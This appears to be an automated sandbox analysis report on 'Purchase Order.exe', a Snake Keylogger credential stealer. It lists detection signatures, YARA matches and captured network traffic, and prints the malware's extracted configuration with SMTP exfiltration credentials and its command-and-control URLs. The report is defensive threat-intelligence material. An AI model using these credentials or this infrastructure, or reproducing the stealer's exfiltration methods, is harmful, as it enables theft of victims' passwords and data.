Edit tour

Windows Analysis Report
Purchase Order.exe

Overview

General Information

Sample name:	Purchase Order.exe
Analysis ID:	1420681
MD5:	10e2a14bbd30f30c2cb7260741a3d70f
SHA1:	aaf6c61c6f5e908e164de1b539096caf9fd9b4d2
SHA256:	8fb359ccf3a3b6a0eff8204f9ee27c2dc41b3270721716192a7ef9253453b59b
Tags:	exeSnakeKeylogger
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

.NET source code contains potential unpacker

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Tries to load missing DLLs

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Purchase Order.exe (PID: 7192 cmdline: "C:\Users\user\Desktop\Purchase Order.exe" MD5: 10E2A14BBD30F30C2CB7260741A3D70F)

Purchase Order.exe (PID: 7692 cmdline: "C:\Users\user\Desktop\Purchase Order.exe" MD5: 10E2A14BBD30F30C2CB7260741A3D70F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "tslogs@mksiimst.com", "Password": "EbxKZL@2", "Host": "us2.smtp.mailhostbox.com ", "Port": "587"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14782:$a1: get_encryptedPassword 0x14a78:$a2: get_encryptedUsername 0x1458e:$a3: get_timePasswordChanged 0x14689:$a4: get_passwordField 0x14798:$a5: set_encryptedPassword 0x15d9b:$a7: get_logins 0x15cfe:$a10: KeyLoggerEventArgs 0x15997:$a11: KeyLoggerEventArgsEventHandler
00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x180c0:$x1: $%SMTPDV$ 0x18124:$x2: $#TheHashHere%& 0x1975f:$x3: %FTPDV$ 0x19853:$x4: $%TelegramDv$ 0x15997:$x5: KeyLoggerEventArgs 0x15cfe:$x5: KeyLoggerEventArgs 0x19783:$m2: Clipboard Logs ID 0x1994f:$m2: Screenshot Logs ID 0x19a1b:$m2: keystroke Logs ID 0x19927:$m4: \SnakeKeylogger\
00000008.00000002.3808084232.0000000003111000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.3808084232.0000000003232000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe1c82:$a1: get_encryptedPassword 0x1024a2:$a1: get_encryptedPassword 0x122ac2:$a1: get_encryptedPassword 0xe1f78:$a2: get_encryptedUsername 0x102798:$a2: get_encryptedUsername 0x122db8:$a2: get_encryptedUsername 0xe1a8e:$a3: get_timePasswordChanged 0x1022ae:$a3: get_timePasswordChanged 0x1228ce:$a3: get_timePasswordChanged 0xe1b89:$a4: get_passwordField 0x1023a9:$a4: get_passwordField 0x1229c9:$a4: get_passwordField 0xe1c98:$a5: set_encryptedPassword 0x1024b8:$a5: set_encryptedPassword 0x122ad8:$a5: set_encryptedPassword 0xe329b:$a7: get_logins 0x103abb:$a7: get_logins 0x1240db:$a7: get_logins 0xe31fe:$a10: KeyLoggerEventArgs 0x103a1e:$a10: KeyLoggerEventArgs 0x12403e:$a10: KeyLoggerEventArgs
00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xe55c0:$x1: $%SMTPDV$ 0x105de0:$x1: $%SMTPDV$ 0x126400:$x1: $%SMTPDV$ 0xe5624:$x2: $#TheHashHere%& 0x105e44:$x2: $#TheHashHere%& 0x126464:$x2: $#TheHashHere%& 0xe6c5f:$x3: %FTPDV$ 0x10747f:$x3: %FTPDV$ 0x127a9f:$x3: %FTPDV$ 0xe6d53:$x4: $%TelegramDv$ 0x107573:$x4: $%TelegramDv$ 0x127b93:$x4: $%TelegramDv$ 0xe2e97:$x5: KeyLoggerEventArgs 0xe31fe:$x5: KeyLoggerEventArgs 0x1036b7:$x5: KeyLoggerEventArgs 0x103a1e:$x5: KeyLoggerEventArgs 0x123cd7:$x5: KeyLoggerEventArgs 0x12403e:$x5: KeyLoggerEventArgs 0xe6c83:$m2: Clipboard Logs ID 0xe6e4f:$m2: Screenshot Logs ID 0xe6f1b:$m2: keystroke Logs ID
00000008.00000002.3808084232.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Purchase Order.exe PID: 7192	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Purchase Order.exe PID: 7192	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Purchase Order.exe PID: 7192	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Purchase Order.exe PID: 7192	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x54a09:$a1: get_encryptedPassword 0x54cf5:$a2: get_encryptedUsername 0x5481f:$a3: get_timePasswordChanged 0x5491a:$a4: get_passwordField 0x54a1f:$a5: set_encryptedPassword 0x56f67:$a7: get_logins 0x56eca:$a10: KeyLoggerEventArgs 0x56b63:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Purchase Order.exe PID: 7192	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x56b63:$x5: KeyLoggerEventArgs 0x56eca:$x5: KeyLoggerEventArgs 0x577b8:$x5: KeyLoggerEventArgs 0x57aec:$x5: KeyLoggerEventArgs 0x590ec:$m2: Clipboard Logs ID 0x591cc:$m2: Screenshot Logs ID 0x59200:$m2: keystroke Logs ID 0x591b8:$m4: \SnakeKeylogger\
Process Memory Space: Purchase Order.exe PID: 7692	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Purchase Order.exe PID: 7692	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Purchase Order.exe PID: 7692	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e1de:$a1: get_encryptedPassword 0x3e4ca:$a2: get_encryptedUsername 0x3dff4:$a3: get_timePasswordChanged 0x3e0ef:$a4: get_passwordField 0x3e1f4:$a5: set_encryptedPassword 0x4073c:$a7: get_logins 0x4069f:$a10: KeyLoggerEventArgs 0x40338:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Purchase Order.exe PID: 7692	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x40338:$x5: KeyLoggerEventArgs 0x4069f:$x5: KeyLoggerEventArgs 0x40f8d:$x5: KeyLoggerEventArgs 0x412c1:$x5: KeyLoggerEventArgs 0x428c1:$m2: Clipboard Logs ID 0x429a1:$m2: Screenshot Logs ID 0x429d5:$m2: keystroke Logs ID 0x4298d:$m4: \SnakeKeylogger\
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.Purchase Order.exe.378b300.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.Purchase Order.exe.378b300.9.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
3.2.Purchase Order.exe.378b300.9.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12b82:$a1: get_encryptedPassword 0x12e78:$a2: get_encryptedUsername 0x1298e:$a3: get_timePasswordChanged 0x12a89:$a4: get_passwordField 0x12b98:$a5: set_encryptedPassword 0x1419b:$a7: get_logins 0x140fe:$a10: KeyLoggerEventArgs 0x13d97:$a11: KeyLoggerEventArgsEventHandler
3.2.Purchase Order.exe.378b300.9.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a49b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x196cd:$a3: \Google\Chrome\User Data\Default\Login Data 0x19b00:$a4: \Orbitum\User Data\Default\Login Data 0x1ab3f:$a5: \Kometa\User Data\Default\Login Data
3.2.Purchase Order.exe.378b300.9.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1372d:$s1: UnHook 0x13734:$s2: SetHook 0x1373c:$s3: CallNextHook 0x13749:$s4: _hook
3.2.Purchase Order.exe.378b300.9.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x164c0:$x1: $%SMTPDV$ 0x16524:$x2: $#TheHashHere%& 0x17b5f:$x3: %FTPDV$ 0x17c53:$x4: $%TelegramDv$ 0x13d97:$x5: KeyLoggerEventArgs 0x140fe:$x5: KeyLoggerEventArgs 0x17b83:$m2: Clipboard Logs ID 0x17d4f:$m2: Screenshot Logs ID 0x17e1b:$m2: keystroke Logs ID 0x17d27:$m4: \SnakeKeylogger\
8.2.Purchase Order.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.Purchase Order.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.Purchase Order.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
8.2.Purchase Order.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14982:$a1: get_encryptedPassword 0x14c78:$a2: get_encryptedUsername 0x1478e:$a3: get_timePasswordChanged 0x14889:$a4: get_passwordField 0x14998:$a5: set_encryptedPassword 0x15f9b:$a7: get_logins 0x15efe:$a10: KeyLoggerEventArgs 0x15b97:$a11: KeyLoggerEventArgsEventHandler
8.2.Purchase Order.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c29b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b4cd:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b900:$a4: \Orbitum\User Data\Default\Login Data 0x1c93f:$a5: \Kometa\User Data\Default\Login Data
8.2.Purchase Order.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1552d:$s1: UnHook 0x15534:$s2: SetHook 0x1553c:$s3: CallNextHook 0x15549:$s4: _hook
8.2.Purchase Order.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x182c0:$x1: $%SMTPDV$ 0x18324:$x2: $#TheHashHere%& 0x1995f:$x3: %FTPDV$ 0x19a53:$x4: $%TelegramDv$ 0x15b97:$x5: KeyLoggerEventArgs 0x15efe:$x5: KeyLoggerEventArgs 0x19983:$m2: Clipboard Logs ID 0x19b4f:$m2: Screenshot Logs ID 0x19c1b:$m2: keystroke Logs ID 0x19b27:$m4: \SnakeKeylogger\
3.2.Purchase Order.exe.37abb20.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.Purchase Order.exe.37abb20.7.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
3.2.Purchase Order.exe.37abb20.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12b82:$a1: get_encryptedPassword 0x12e78:$a2: get_encryptedUsername 0x1298e:$a3: get_timePasswordChanged 0x12a89:$a4: get_passwordField 0x12b98:$a5: set_encryptedPassword 0x1419b:$a7: get_logins 0x140fe:$a10: KeyLoggerEventArgs 0x13d97:$a11: KeyLoggerEventArgsEventHandler
3.2.Purchase Order.exe.37abb20.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a49b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x196cd:$a3: \Google\Chrome\User Data\Default\Login Data 0x19b00:$a4: \Orbitum\User Data\Default\Login Data 0x1ab3f:$a5: \Kometa\User Data\Default\Login Data
3.2.Purchase Order.exe.37abb20.7.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1372d:$s1: UnHook 0x13734:$s2: SetHook 0x1373c:$s3: CallNextHook 0x13749:$s4: _hook
3.2.Purchase Order.exe.37abb20.7.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x164c0:$x1: $%SMTPDV$ 0x16524:$x2: $#TheHashHere%& 0x17b5f:$x3: %FTPDV$ 0x17c53:$x4: $%TelegramDv$ 0x13d97:$x5: KeyLoggerEventArgs 0x140fe:$x5: KeyLoggerEventArgs 0x17b83:$m2: Clipboard Logs ID 0x17d4f:$m2: Screenshot Logs ID 0x17e1b:$m2: keystroke Logs ID 0x17d27:$m4: \SnakeKeylogger\
3.2.Purchase Order.exe.37abb20.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.Purchase Order.exe.37abb20.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.Purchase Order.exe.37abb20.7.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
3.2.Purchase Order.exe.37abb20.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14982:$a1: get_encryptedPassword 0x34fa2:$a1: get_encryptedPassword 0x14c78:$a2: get_encryptedUsername 0x35298:$a2: get_encryptedUsername 0x1478e:$a3: get_timePasswordChanged 0x34dae:$a3: get_timePasswordChanged 0x14889:$a4: get_passwordField 0x34ea9:$a4: get_passwordField 0x14998:$a5: set_encryptedPassword 0x34fb8:$a5: set_encryptedPassword 0x15f9b:$a7: get_logins 0x365bb:$a7: get_logins 0x15efe:$a10: KeyLoggerEventArgs 0x3651e:$a10: KeyLoggerEventArgs 0x15b97:$a11: KeyLoggerEventArgsEventHandler 0x361b7:$a11: KeyLoggerEventArgsEventHandler
3.2.Purchase Order.exe.37abb20.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1552d:$s1: UnHook 0x35b4d:$s1: UnHook 0x15534:$s2: SetHook 0x35b54:$s2: SetHook 0x1553c:$s3: CallNextHook 0x35b5c:$s3: CallNextHook 0x15549:$s4: _hook 0x35b69:$s4: _hook
3.2.Purchase Order.exe.37abb20.7.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x182c0:$x1: $%SMTPDV$ 0x388e0:$x1: $%SMTPDV$ 0x18324:$x2: $#TheHashHere%& 0x38944:$x2: $#TheHashHere%& 0x1995f:$x3: %FTPDV$ 0x39f7f:$x3: %FTPDV$ 0x19a53:$x4: $%TelegramDv$ 0x3a073:$x4: $%TelegramDv$ 0x15b97:$x5: KeyLoggerEventArgs 0x15efe:$x5: KeyLoggerEventArgs 0x361b7:$x5: KeyLoggerEventArgs 0x3651e:$x5: KeyLoggerEventArgs 0x19983:$m2: Clipboard Logs ID 0x19b4f:$m2: Screenshot Logs ID 0x19c1b:$m2: keystroke Logs ID 0x39fa3:$m2: Clipboard Logs ID 0x3a16f:$m2: Screenshot Logs ID 0x3a23b:$m2: keystroke Logs ID 0x19b27:$m4: \SnakeKeylogger\ 0x3a147:$m4: \SnakeKeylogger\
3.2.Purchase Order.exe.378b300.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.Purchase Order.exe.378b300.9.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.Purchase Order.exe.378b300.9.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
3.2.Purchase Order.exe.378b300.9.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14982:$a1: get_encryptedPassword 0x351a2:$a1: get_encryptedPassword 0x557c2:$a1: get_encryptedPassword 0x14c78:$a2: get_encryptedUsername 0x35498:$a2: get_encryptedUsername 0x55ab8:$a2: get_encryptedUsername 0x1478e:$a3: get_timePasswordChanged 0x34fae:$a3: get_timePasswordChanged 0x555ce:$a3: get_timePasswordChanged 0x14889:$a4: get_passwordField 0x350a9:$a4: get_passwordField 0x556c9:$a4: get_passwordField 0x14998:$a5: set_encryptedPassword 0x351b8:$a5: set_encryptedPassword 0x557d8:$a5: set_encryptedPassword 0x15f9b:$a7: get_logins 0x367bb:$a7: get_logins 0x56ddb:$a7: get_logins 0x15efe:$a10: KeyLoggerEventArgs 0x3671e:$a10: KeyLoggerEventArgs 0x56d3e:$a10: KeyLoggerEventArgs
3.2.Purchase Order.exe.378b300.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1552d:$s1: UnHook 0x35d4d:$s1: UnHook 0x5636d:$s1: UnHook 0x15534:$s2: SetHook 0x35d54:$s2: SetHook 0x56374:$s2: SetHook 0x1553c:$s3: CallNextHook 0x35d5c:$s3: CallNextHook 0x5637c:$s3: CallNextHook 0x15549:$s4: _hook 0x35d69:$s4: _hook 0x56389:$s4: _hook
3.2.Purchase Order.exe.378b300.9.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x182c0:$x1: $%SMTPDV$ 0x38ae0:$x1: $%SMTPDV$ 0x59100:$x1: $%SMTPDV$ 0x18324:$x2: $#TheHashHere%& 0x38b44:$x2: $#TheHashHere%& 0x59164:$x2: $#TheHashHere%& 0x1995f:$x3: %FTPDV$ 0x3a17f:$x3: %FTPDV$ 0x5a79f:$x3: %FTPDV$ 0x19a53:$x4: $%TelegramDv$ 0x3a273:$x4: $%TelegramDv$ 0x5a893:$x4: $%TelegramDv$ 0x15b97:$x5: KeyLoggerEventArgs 0x15efe:$x5: KeyLoggerEventArgs 0x363b7:$x5: KeyLoggerEventArgs 0x3671e:$x5: KeyLoggerEventArgs 0x569d7:$x5: KeyLoggerEventArgs 0x56d3e:$x5: KeyLoggerEventArgs 0x19983:$m2: Clipboard Logs ID 0x19b4f:$m2: Screenshot Logs ID 0x19c1b:$m2: keystroke Logs ID
Click to see the 26 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DesusertionIp: 208.91.199.225, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Purchase Order.exe, Initiated: true, ProcessId: 7692, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49730

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Purchase Order.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://scratchdreams.tk	Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk/_send_.php?TS	Avira URL Cloud: Label: malware
Source: http://scratchdreams.tk	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "tslogs@mksiimst.com", "Password": "EbxKZL@2", "Host": "us2.smtp.mailhostbox.com ", "Port": "587"}

Multi AV Scanner detection for domain / URL

Source: scratchdreams.tk	Virustotal: Detection: 6%	Perma Link
Source: http://scratchdreams.tk	Virustotal: Detection: 6%	Perma Link
Source: https://scratchdreams.tk	Virustotal: Detection: 15%	Perma Link

Multi AV Scanner detection for submitted file

Source: Purchase Order.exe	ReversingLabs: Detection: 31%
Source: Purchase Order.exe	Virustotal: Detection: 36%			Perma Link

Machine Learning detection for sample

Source: Purchase Order.exe

Joe Sandbox ML: detected

Source: Purchase Order.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.9:49712 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.9:49728 version: TLS 1.2

Source: Purchase Order.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: FRZs.pdbSHA256 source: Purchase Order.exe
Source:	Binary string: FRZs.pdb source: Purchase Order.exe

Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 0152FCD1h	8_2_0152FA10
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 0152EFDDh	8_2_0152EDF0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 0152F967h	8_2_0152EDF0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_0152E310
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_0152E943
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_0152EB23
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 05A98945h	8_2_05A98608
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 05A90FF1h	8_2_05A90D48
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 05A98001h	8_2_05A97D58
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 05A97751h	8_2_05A974A8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 05A90741h	8_2_05A90498
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 05A96A21h	8_2_05A96778
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 05A96171h	8_2_05A95EC8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 05A958C1h	8_2_05A95618
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 05A98459h	8_2_05A981B0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 05A95441h	8_2_05A95198
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 05A97BA9h	8_2_05A97900
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 05A90B99h	8_2_05A908F0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 05A902E9h	8_2_05A90040
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 05A972FAh	8_2_05A97050
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_05A933A8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_05A933B8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 05A96E79h	8_2_05A96BD0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 05A965C9h	8_2_05A96320
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 05A95D19h	8_2_05A95A70

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 8.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Purchase Order.exe.37abb20.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Purchase Order.exe.378b300.9.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.9:49730 -> 208.91.199.225:587

Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.91.199.225 208.91.199.225
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242
Source: Joe Sandbox View	IP Address: 172.67.177.134 172.67.177.134

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: global traffic

TCP traffic: 192.168.2.9:49730 -> 208.91.199.225:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
